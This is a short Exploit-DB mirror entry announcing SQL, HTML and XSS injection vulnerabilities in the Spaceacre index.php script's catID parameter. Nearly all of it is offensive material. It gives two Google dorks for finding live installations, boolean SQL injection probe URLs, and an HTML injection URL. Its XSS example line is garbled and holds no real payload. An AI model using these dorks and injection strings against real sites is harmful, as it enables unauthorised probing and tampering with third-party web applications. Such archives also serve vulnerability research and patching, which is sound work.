exploit-db-mirror/platforms/php/webapps/12756.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

33 lines
No EOL
1.1 KiB
Text
Executable file

-------------------------------------------------------------------------------------------
Spaceacre (index.php) SQL/HTML/XSS Injection Vulnerability
-------------------------------------------------------------------------------------------
Author: CoBRa_21
Script Home: http://www.spaceacre.com
Dork 1: inurl:cat1.php?catID= "Spaceacre"
Dork 2: intext:"Designed by Spaceacre"
-------------------------------------------------------------------------------------------
SQL Injection:
http://localhost/[path]/index.php?catID=1 and 1=2
http://localhost/[path]/index.php?catID=1 and 1=1
-------------------------------------------------------------------------------------------
HTML Injection:
http://localhost/[path]/index.php?catID=<font size=15 color=green>CoBRa_21</font> HTML &#304;NJ.
-------------------------------------------------------------------------------------------
XSS Injection:
http://localhost/[path]/index.php?catID=index.php?catID= XSS &#304;NJ.
-------------------------------------------------------------------------------------------